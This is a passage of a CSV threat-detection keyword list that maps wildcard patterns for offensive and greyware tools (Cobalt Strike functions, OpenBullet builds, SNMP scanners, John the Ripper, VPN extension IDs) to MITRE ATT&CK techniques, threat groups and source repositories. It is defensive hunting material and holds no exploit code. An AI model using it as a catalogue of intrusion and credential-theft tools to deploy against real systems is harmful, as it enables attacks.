windows and cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Yaxser/CobaltStrike-BOF","1","1","N/A","10","10","297","54","2023-02-24T13:12:14Z","2020-10-08T01:12:41Z" +"*onecloudemoji/CVE-2022-30190*","offensive_tool_keyword","POC","CVE-2022-30190 Follina POC","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/onecloudemoji/CVE-2022-30190","1","1","N/A","N/A","2","107","33","2022-05-31T09:35:37Z","2022-05-31T06:45:25Z" +"*OneDrive Enumerator*","offensive_tool_keyword","onedrive_user_enum","enumerate valid onedrive users","T1087 - T1110","TA0006","N/A","N/A","Network Exploitation tools","https://github.com/nyxgeek/onedrive_user_enum","1","1","N/A","N/A","5","490","73","2023-09-21T06:52:07Z","2019-03-05T08:54:38Z" +"*onedrive_enum.py*","offensive_tool_keyword","onedrive_user_enum","enumerate valid onedrive users","T1087 - T1110","TA0006","N/A","N/A","Network Exploitation tools","https://github.com/nyxgeek/onedrive_user_enum","1","1","N/A","N/A","5","490","73","2023-09-21T06:52:07Z","2019-03-05T08:54:38Z" +"*onedrive_exports_version_dll.txt*","offensive_tool_keyword","Chimera","Automated DLL Sideloading Tool With EDR Evasion Capabilities","T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/georgesotiriadis/Chimera","1","0","N/A","9","3","282","41","2023-09-21T14:01:23Z","2023-05-15T13:02:54Z" +"*onedrive_user_enum.git*","offensive_tool_keyword","onedrive_user_enum","enumerate valid onedrive users","T1087 - T1110","TA0006","N/A","N/A","Network Exploitation tools","https://github.com/nyxgeek/onedrive_user_enum","1","1","N/A","N/A","5","490","73","2023-09-21T06:52:07Z","2019-03-05T08:54:38Z" +"*One-Lin3r*","offensive_tool_keyword","One-Lin3r","One-Lin3r is simple modular and light-weight framework gives you all the one-liners that you will need while penetration testing (Windows. Linux. macOS or even BSD systems) or hacking generally with a lot of new features to make all of this fully automated (ex: you won't even need to copy the one-liners).","T1059 - T1003 - T1053","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation tools","https://github.com/D4Vinci/One-Lin3r","1","1","N/A","N/A","10","1596","307","2022-02-10T18:17:57Z","2018-01-14T21:26:04Z" +"*onesixtyone -c *snmp_default_pass.txt*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*onesixtyone -c *wordlists/*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*onesixtyone -i * -c*","offensive_tool_keyword","onesixtyone","Fast SNMP scanner. onesixtyone takes a different approach to SNMP scanning. It takes advantage of the fact that SNMP is a connectionless protocol and sends all SNMP requests as fast as it can. Then the scanner waits for responses to come back and logs them in a fashion similar to Nmap ping sweeps","T1046 - T1018","TA0007 - TA0005","N/A","N/A","Reconnaissance","https://github.com/trailofbits/onesixtyone","1","0","N/A","N/A","5","416","86","2023-04-11T18:21:38Z","2014-02-07T17:02:49Z" +"*onesixtyone.1*","offensive_tool_keyword","onesixtyone","Fast SNMP scanner. onesixtyone takes a different approach to SNMP scanning. It takes advantage of the fact that SNMP is a connectionless protocol and sends all SNMP requests as fast as it can. Then the scanner waits for responses to come back and logs them in a fashion similar to Nmap ping sweeps","T1046 - T1018","TA0007 - TA0005","N/A","N/A","Reconnaissance","https://github.com/trailofbits/onesixtyone","1","1","N/A","N/A","5","416","86","2023-04-11T18:21:38Z","2014-02-07T17:02:49Z" +"*onesixtyone.git*","offensive_tool_keyword","onesixtyone","Fast SNMP scanner. onesixtyone takes a different approach to SNMP scanning. It takes advantage of the fact that SNMP is a connectionless protocol and sends all SNMP requests as fast as it can. Then the scanner waits for responses to come back and logs them in a fashion similar to Nmap ping sweeps","T1046 - T1018","TA0007 - TA0005","N/A","N/A","Reconnaissance","https://github.com/trailofbits/onesixtyone","1","1","N/A","N/A","5","416","86","2023-04-11T18:21:38Z","2014-02-07T17:02:49Z" +"*OnionScan*","offensive_tool_keyword","onionscan","OnionScan has two primary goals: We want to help operators of hidden services find and fix operational security issues with their services. We want to help them detect misconfigurations and we want to inspire a new generation of anonymity engineering projects to help make the world a more private place. Secondly we want to help researchers and investigators monitor and track Dark Web sites. In fact we want to make this as easy as possible. Not because we agree with the goals and motives of every investigation force out there - most often we don't. But by making these kinds of investigations easy. we hope to create a powerful incentive for new anonymity technology","T1589 - T1591 - T1596 - T1599","TA0011 - TA0012","N/A","N/A","Information Gathering","https://onionscan.org/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*oofgbpoabipfcfjapgnbbjjaenockbdp*","greyware_tool_keyword","SetupVPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*ookhnhpkphagefgdiemllfajmkdkcaim*","greyware_tool_keyword","iNinja VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*openBeaconBrowser*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" +"*openBeaconBrowser*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*openBeaconConsole*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" +"*openBeaconConsole*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*openbsd_softraid2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*OpenBullet.csproj*","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/openbullet","1","1","N/A","10","10","1342","714","2023-02-24T16:29:01Z","2019-03-26T09:06:32Z" +"*OpenBullet.exe*","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/openbullet","1","1","N/A","10","10","1342","714","2023-02-24T16:29:01Z","2019-03-26T09:06:32Z" +"*OpenBullet.pdb*","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/openbullet","1","1","N/A","10","10","1342","714","2023-02-24T16:29:01Z","2019-03-26T09:06:32Z" +"*OpenBullet.sln*","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/openbullet","1","1","N/A","10","10","1342","714","2023-02-24T16:29:01Z","2019-03-26T09:06:32Z" +"*OpenBullet.zip*","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/openbullet","1","1","N/A","10","10","1342","714","2023-02-24T16:29:01Z","2019-03-26T09:06:32Z" +"*openbullet/openbullet*","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/openbullet","1","1","N/A","10","10","1342","714","2023-02-24T16:29:01Z","2019-03-26T09:06:32Z" +"*OpenBullet2.Console.zip*","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/OpenBullet2","1","1","N/A","10","10","1329","425","2023-10-04T18:54:15Z","2020-04-23T14:04:16Z" +"*OpenBullet2.Native.exe*","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/OpenBullet2","1","1","N/A","10","10","1329","425","2023-10-04T18:54:15Z","2020-04-23T14:04:16Z" +"*OpenBullet2.Native.zip*","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/OpenBullet2","1","1","N/A","10","10","1329","425","2023-10-04T18:54:15Z","2020-04-23T14:04:16Z" +"*OpenBullet2.zip*","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/OpenBullet2","1","1","N/A","10","10","1329","425","2023-10-04T18:54:15Z","2020-04-23T14:04:16Z" +"*openbullet2:latest*","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/OpenBullet2","1","0","N/A","10","10","1329","425","2023-10-04T18:54:15Z","2020-04-23T14:04:16Z" +"*OpenBullet2-master*","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/OpenBullet2","1","1","N/A","10","10","1329","425","2023-10-04T18:54:15Z","2020-04-23T14:04:16Z" +"*OpenBulletApp.cs*","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/openbullet","1","1","N/A","10","10","1342","714","2023-02-24T16:29:01Z","2019-03-26T09:06:32Z" +"*OpenBulletCLI.csproj*","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/openbullet","1","1","N/A","10","10","1342","714","2023-02-24T16:29:01Z","2019-03-26T09:06:32Z" +"*OpenBulletCLI.exe*","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/openbullet","1","1","N/A","10","10","1342","714","2023-02-24T16:29:01Z","2019-03-26T09:06:32Z" +"*openbullet-master*","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/openbullet","1","1","N/A","10","10","1342","714","2023-02-24T16:29:01Z","2019-03-26T09:06:32Z" +"*openBypassUACDialog*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" +"*openBypassUACDialog*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*opencubicles/h8mail*","offensive_tool_keyword","h8mail","Powerful and user-friendly password hunting tool.","T1581.002 - T1591 - T1590 - T1596 - T1592 - T1217.001","TA0010","N/A","N/A","Information Gathering","https://github.com/opencubicles/h8mail","1","1","N/A","N/A","1","9","5","2019-08-19T09:46:33Z","2019-08-19T09:45:32Z" +"*OPENCYBER-FR/RustHound*","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","AD Enumeration","https://github.com/OPENCYBER-FR/RustHound","1","1","N/A","9","7","676","56","2023-08-31T08:35:38Z","2022-10-12T05:54:35Z" +"*openGoldenTicketDialog*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*openKeystrokeBrowser*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*openPayloadGenerator*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" +"*openPayloadGeneratorDialog*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*openPayloadHelper*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*openPortScanner*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - 